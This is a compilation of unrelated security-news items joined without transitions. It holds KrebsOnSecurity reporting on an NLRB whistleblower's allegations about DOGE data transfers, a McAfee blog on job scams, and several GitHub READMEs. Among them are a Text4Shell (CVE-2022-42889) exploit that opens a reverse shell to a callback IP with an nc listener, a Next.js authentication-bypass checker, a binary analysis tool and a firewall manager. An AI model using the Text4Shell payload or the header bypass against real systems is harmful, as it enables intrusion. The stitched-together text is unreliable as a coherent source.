The README file from the GitHub user Ge0rg3’s page for requests-ip-rotator includes the exact wording of a program the whistleblower said was downloaded by one of the DOGE users. Marko Elez created an offshoot of this program in January 2025.
“A Python library to utilize AWS API Gateway’s large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing,” the description reads.
Ge0rg3’s code is “open source,” in that anyone can copy it and reuse it non-commercially. As it happens, there is a newer version of this project that was derived or “forked” from Ge0rg3’s code — called “async-ip-rotator” — and it was committed to GitHub in January 2025 by DOGE captain Marko Elez.
The whistleblower stated that one of the GitHub files downloaded by the DOGE employees who transferred sensitive files from an NLRB case database was an archive whose README file read: “Python library to utilize AWS API Gateway’s large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Elez’s code pictured here was forked in January 2025 from a code library that shares the same description.
A key DOGE staff member who gained access to the Treasury Department’s central payments system, Elez has worked for a number of Musk companies, including X, SpaceX, and xAI. Elez was among the first DOGE employees to face public scrutiny, after The Wall Street Journal linked him to social media posts that advocated racism and eugenics.
Elez resigned after that brief scandal, but was rehired after President Donald Trump and Vice President JD Vance expressed support for him. Politico reports Elez is now a Labor Department aide detailed to multiple agencies, including the Department of Health and Human Services.
“During Elez’s initial stint at Treasury, he violated the agency’s information security policies by sending a spreadsheet containing names and payments information to officials at the General Services Administration,” Politico wrote, citing court filings.
KrebsOnSecurity sought comment from both the NLRB and DOGE, and will update this story if either responds.
The NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function. Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.
Berulis’s complaint alleges the DOGE accounts at NLRB downloaded more than 10 gigabytes of data from the agency’s case files, a database that includes reams of sensitive records including information about employees who want to form unions and proprietary business documents. Berulis said he went public after higher-ups at the agency told him not to report the matter to the US-CERT, as they’d previously agreed.
Berulis told KrebsOnSecurity he worried the unauthorized data transfer by DOGE could unfairly advantage defendants in a number of ongoing labor disputes before the agency.
“If any company got the case data that would be an unfair advantage,” Berulis said. “They could identify and fire employees and union organizers without saying why.”
Marko Elez, in a photo from a social media profile.
Berulis said the other two GitHub archives that DOGE employees downloaded to NLRB systems included Integuru, a software framework designed to reverse engineer application programming interfaces (APIs) that websites use to fetch data; and a “headless” browser called Browserless, which is made for automating web-based tasks that require a pool of browsers, such as web scraping and automated testing.
On February 6, someone posted a lengthy and detailed critique of Elez’s code on the GitHub “issues” page for async-ip-rotator, calling it “insecure, unscalable and a fundamental engineering failure.”
“If this were a side project, it would just be bad code,” the reviewer wrote. “But if this is representative of how you build production systems, then there are much larger concerns. This implementation is fundamentally broken, and if anything similar to this is deployed in an environment handling sensitive data, it should be audited immediately.”
Further reading: Berulis’s complaint (PDF).
Update 7:06 p.m. ET: Elez’s code repo was deleted after this story was published. An archived version of it is here.
Job scams are on the rise. And asking the right questions can help steer you clear of them.
That rise in job scams is steep, according to the U.S. Federal Trade Commission (FTC). Recent data shows that reported losses have grown five times over between 2020 and 2024. In 2024 alone, reported losses hit half a billion dollars, with unreported losses undoubtedly pushing actual losses yet higher.
Last week, we covered how “pay to get paid” scams account for a big chunk of online job scams. Here, we’ll cover a couple more that we’ve seen circulating on social media and via texts—and how some pointed questions can help you avoid them.
Some job scammers pose as recruiters from job agencies who reach potential victims the same way legitimate agencies do—by email, text, and networking sites. Sometimes this leaves people with their guard down because it’s not unheard of at all to get contacted this way, “out of the blue” so to speak.
Yet one of the quickest ways to spot a scammer is when the “recruiter” asks to pay a fee for the matchmaking, particularly if they ask for it up front. Legitimate headhunters, temp agencies, and staffing agencies typically get paid by the company or business that ultimately does the hiring. Job candidates don’t pay a thing.
Another form of scam occurs during the “onboarding” process of the job. The scammer happily welcomes the victim to the company and then informs them that they’ll need to take some online training and perhaps buy a computer or other office equipment. Of course, the scammer asks the victim to pay for all of it—leaving the victim out of hundreds of dollars and the scammer with their payment info.
One way you can spot a job scam is to press for answers. Asking pointed questions about a company and the job it’s offering, just as you would in any real interview, can reveal gaps in a scammer’s story. In effect, scammers are putting on an acting job, and some don’t thoroughly prepare for their role. They don’t think through the details, hoping that victims will be happy enough about a job prospect to ask too many questions.
If the hiring process moves quicker than expected or details about a job seem light, it’s indeed time to ask questions. Here are a few you can keep handy when you start to wonder if you have a scam on your hands …
This is a great place to start. Legitimate employers write up job listings that they post on their website and job sites. In those descriptions, the work and everything it entails gets spelled out to the letter. A real employer should be able to provide you with a job description or at least cover it clearly over the course of a conversation.
This one can trip up a scammer quickly. A scammer might avoid giving a physical address. Likewise, they might offer up a fake one. Either a non-answer or a lie can readily call out a scam by following up the question with a web search for a physical address. (Resources like the Better Business Bureau can also help you research a company and its track record.)
Asking about co-workers, bosses, reporting structures and the like can also help sniff out a scam. Real employers, once again, will have ready answers here. They might even start dropping names and details about people’s tenure and background. Meanwhile, this is one more place where scammers might tip their hand because they haven’t made up those details.
This question alone can offer a telltale sign. Many job scams move through the hiring process at relative breakneck speed—skipping past the usual interview loops and callbacks that many legitimate jobs have. Scammers want to turn over their victims quickly, so they’ll make the “hiring process” quick as well. If it feels like you’re blazing through the steps, it could be a scam.
Every business has a story, even if it’s still in its startup days. Anyone in a recruiting or hiring position will have a good handle on this question, as they will on any follow-up questions about the company’s mission or goals. Again, vagueness in response to these kinds of questions could be a sign of a scam.
Whether it’s through social media sites like Facebook, Instagram, and the like, scammers often reach out through direct messages. Recruiters stick to legitimate business networking sites like LinkedIn. Companies maintain established accounts on recruiting platforms that people know and trust, so view any contact outside of them as suspicious.
Scammers use the “hiring process” to trick people into providing their personal info with malicious links. Web protection, included in our plans, can steer you clear of them. Likewise, our Scam Detector scans URLs in your text messages and alerts you if they’re sketchy. If you accidentally click a bad link, both web and text scam protection will block a risky site.
Many scammers get your contact info from data broker sites. McAfee’s Personal Data Cleanup scans some of the riskiest data broker sites, shows you which ones are selling your personal info, and, depending on your plan, can help you remove it. Our Social Privacy Manager lowers your public profile lower still. It helps you adjust more than 100 privacy settings across your social media accounts in just a few clicks, so your personal info is only visible to the people you want to share it with.
The post Interviewing for a Job? Spot a Scam with These Questions appeared first on McAfee Blog.
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor
class with interpolation enabled, allowing injection of ${script:...}
expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data
query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor
.
Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...}
interpolation from untrusted input
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell is sent via /data
parameter using a POST request.
A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).
The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest
.
Next JS versions affected: - 11.1.4 and up
[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
Clone the repo
git clone https://github.com/takumade/ghost-route.git
cd ghost-route
Create and activate virtual environment
python -m venv .venv
source .venv/bin/activate
Install dependencies
pip install -r requirements.txt
python ghost-route.py <url> <path> <show_headers>
<url>
: Base URL of the Next.js site (e.g., https://example.com)<path>
: Protected path to test (default: /admin)<show_headers>
: Show response headers (default: False)Basic Example
python ghost-route.py https://example.com /admin
Show Response Headers
python ghost-route.py https://example.com /admin True
MIT License
A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk‘s Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusual large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.
The cover letter from Berulis’s whistleblower statement, sent to the leaders of the Senate Select Committee on Intelligence.
The allegations came in an April 14 letter to the Senate Select Committee on Intelligence, signed by Daniel J. Berulis, a 38-year-old security architect at the NLRB.
NPR, which was the first to report on Berulis’s whistleblower complaint, says NLRB is a small, independent federal agency that investigates and adjudicates complaints about unfair labor practices, and stores “reams of potentially sensitive data, from confidential information about employees who want to form unions to proprietary business information.”
The complaint documents a one-month period beginning March 3, during which DOGE officials reportedly demanded the creation of all-powerful “tenant admin” accounts in NLRB systems that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.
Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.
Berulis writes that on March 3, a black SUV accompanied by a police escort arrived at his building — the NLRB headquarters in Southeast Washington, D.C. The DOGE staffers did not speak with Berulis or anyone else in NLRB’s IT staff, but instead met with the agency leadership.
“Our acting chief information officer told us not to adhere to standard operating procedure with the DOGE account creation, and there was to be no logs or records made of the accounts created for DOGE employees, who required the highest level of access,” Berulis wrote of their instructions after that meeting.
“We have built in roles that auditors can use and have used extensively in the past but would not give the ability to make changes or access subsystems without approval,” he continued. “The suggestion that they use these accounts was not open to discussion.”
Berulis found that on March 3 one of the DOGE accounts created an opaque, virtual environment known as a “container,” which can be used to build and run programs or scripts without revealing its activities to the rest of the world. Berulis said the container caught his attention because he polled his colleagues and found none of them had ever used containers within the NLRB network.
Berulis said he also noticed that early the next morning — between approximately 3 a.m. and 4 a.m. EST on Tuesday, March 4 — there was a large increase in outgoing traffic from the agency. He said it took several days of investigating with his colleagues to determine that one of the new accounts had transferred approximately 10 gigabytes worth of data from the NLRB’s NxGen case management system.
Berulis said neither he nor his co-workers had the necessary network access rights to review which files were touched or transferred — or even where they went. But his complaint notes the NxGen database contains sensitive information on unions, ongoing legal cases, and corporate secrets.
“I also don’t know if the data was only 10gb in total or whether or not they were consolidated and compressed prior,” Berulis told the senators. “This opens up the possibility that even more data was exfiltrated. Regardless, that kind of spike is extremely unusual because data almost never directly leaves NLRB’s databases.”
Berulis said he and his colleagues grew even more alarmed when they noticed nearly two dozen login attempts from a Russian Internet address (83.149.30,186) that presented valid login credentials for a DOGE employee account — one that had been created just minutes earlier. Berulis said those attempts were all blocked thanks to rules in place that prohibit logins from non-U.S. locations.
“Whoever was attempting to log in was using one of the newly created accounts that were used in the other DOGE related activities and it appeared they had the correct username and password due to the authentication flow only stopping them due to our no-out-of-country logins policy activating,” Berulis wrote. “There were more than 20 such attempts, and what is particularly concerning is that many of these login attempts occurred within 15 minutes of the accounts being created by DOGE engineers.”
According to Berulis, the naming structure of one Microsoft user account connected to the suspicious activity suggested it had been created and later deleted for DOGE use in the NLRB’s cloud systems: “DogeSA_2d5c3e0446f9@nlrb.microsoft.com.” He also found other new Microsoft cloud administrator accounts with nonstandard usernames, including “Whitesox, Chicago M.” and “Dancehall, Jamaica R.”
On March 5, Berulis documented that a large section of logs for recently created network resources were missing, and a network watcher in Microsoft Azure was set to the “off” state, meaning it was no longer collecting and recording data like it should have.
Berulis said he discovered someone had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever use. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.
The complaint alleges that by March 17 it became clear the NLRB no longer had the resources or network access needed to fully investigate the odd activity from the DOGE accounts, and that on March 24, the agency’s associate chief information officer had agreed the matter should be reported to US-CERT. Operated by the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), US-CERT provides on-site cyber incident response capabilities to federal and state agencies.
But Berulis said that between April 3 and 4, he and the associate CIO were informed that “instructions had come down to drop the US-CERT reporting and investigation and we were directed not to move forward or create an official report.” Berulis said it was at this point he decided to go public with his findings.
An email from Daniel Berulis to his colleagues dated March 28, referencing the unexplained traffic spike earlier in the month and the unauthorized changing of security controls for user accounts.
Tim Bearese, the NLRB’s acting press secretary, told NPR that DOGE neither requested nor received access to its systems, and that “the agency conducted an investigation after Berulis raised his concerns but ‘determined that no breach of agency systems occurred.'” The NLRB did not respond to questions from KrebsOnSecurity.
Nevertheless, Berulis has shared a number of supporting screenshots showing agency email discussions about the unexplained account activity attributed to the DOGE accounts, as well as NLRB security alerts from Microsoft about network anomalies observed during the timeframes described.
As CNN reported last month, the NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function.
“Despite its limitations, the agency had become a thorn in the side of some of the richest and most powerful people in the nation — notably Elon Musk, Trump’s key supporter both financially and arguably politically,” CNN wrote.
Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.
Berulis shared screenshots with KrebsOnSecurity showing that on the day the NPR published its story about his claims (April 14), the deputy CIO at NLRB sent an email stating that administrative control had been removed from all employee accounts. Meaning, suddenly none of the IT employees at the agency could do their jobs properly anymore, Berulis said.
An email from the NLRB’s associate chief information officer Eric Marks, notifying employees they will lose security administrator privileges.
Berulis shared a screenshot of an agency-wide email dated April 16 from NLRB director Lasharn Hamilton saying DOGE officials had requested a meeting, and reiterating claims that the agency had no prior “official” contact with any DOGE personnel. The message informed NLRB employees that two DOGE representatives would be detailed to the agency part-time for several months.
An email from the NLRB Director Lasharn Hamilton on April 16, stating that the agency previously had no contact with DOGE personnel.
Berulis told KrebsOnSecurity he was in the process of filing a support ticket with Microsoft to request more information about the DOGE accounts when his network administrator access was restricted. Now, he’s hoping lawmakers will ask Microsoft to provide more information about what really happened with the accounts.
“That would give us way more insight,” he said. “Microsoft has to be able to see the picture better than we can. That’s my goal, anyway.”
Berulis’s attorney told lawmakers that on April 7, while his client and legal team were preparing the whistleblower complaint, someone physically taped a threatening note to Mr. Berulis’s home door with photographs — taken via drone — of him walking in his neighborhood.
“The threatening note made clear reference to this very disclosure he was preparing for you, as the proper oversight authority,” reads a preface by Berulis’s attorney Andrew P. Bakaj. “While we do not know specifically who did this, we can only speculate that it involved someone with the ability to access NLRB systems.”
Berulis said the response from friends, colleagues and even the public has been largely supportive, and that he doesn’t regret his decision to come forward.
“I didn’t expect the letter on my door or the pushback from [agency] leaders,” he said. “If I had to do it over, would I do it again? Yes, because it wasn’t really even a choice the first time.”
For now, Mr. Berulis is taking some paid family leave from the NLRB. Which is just as well, he said, considering he was stripped of the tools needed to do his job at the agency.
“They came in and took full administrative control and locked everyone out, and said limited permission will be assigned on a need basis going forward” Berulis said of the DOGE employees. “We can’t really do anything, so we’re literally getting paid to count ceiling tiles.”
Further reading: Berulis’s complaint (PDF).
Bytes Revealer is a powerful reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features like hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract valuable information from any binary file.
Bytes Revealer do NOT store any file or data. All analysis is performed in your browser.
Current Limitation: Files less than 50MB can perform all analysis, files bigger up to 1.5GB will only do Visual View and Hex View analysis.
# Node.js 14+ is required
node -v
docker-compose build --no-cache
docker-compose up -d
Now open your browser: http://localhost:8080/
To stop the docker container
docker-compose down
# Clone the repository
git clone https://github.com/vulnex/bytesrevealer
# Navigate to project directory
cd bytesrevealer
# Install dependencies
npm install
# Start development server
npm run dev
# Build the application
npm run build
# Preview production build
npm run preview
Progress bar shows upload and analysis status
Analysis Views
Real-time updates as you navigate
Search Functions
Results are highlighted in the current view
String Analysis
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)This project is licensed under the MIT License - see the LICENSE.md file for details.
Follow these steps to set up and run the API project:
git clone https://github.com/adriyansyah-mf/CentralizedFirewall
cd CentralizedFirewall
.env
FileUpdate the environment variables in .env
according to your configuration.
nano .env
docker compose up -d
This will start the API in detached mode.
Check if the containers are up:
docker ps
docker compose down
docker compose restart
Let me know if you need any modifications! 🚀
sudo dpkg -i firewall-client_deb.deb
nano /usr/local/bin/config.ini
[settings]
api_url = API-URL
api_key = API-KEY
hostname = Node Hostname (make it unique and same as the hostname on the SIEM)
systemctl daemon-reload
systemctl start firewall-agent
systemctl status firewall-agent
Username: admin
Password: admin
You can change the default credential on the setting page
curl -X 'POST' \
'http://api-server:8000/general/add-ip?ip=123.1.1.99&hostname=test&apikey=apikey&comment=log' \
-H 'accept: application/json' \
-d ''
You can see the swagger documentation on the following link
http://api-server:8000/docs
DB=changeme
JWT_SECRET=changeme
PASSWORD_SALT=changme
PASSWORD_TOKEN_KEY=changme
OPENCTI_URL=changme
OPENCTI_TOKEN=changme
If you find this project helpful, consider supporting me through GitHub Sponsors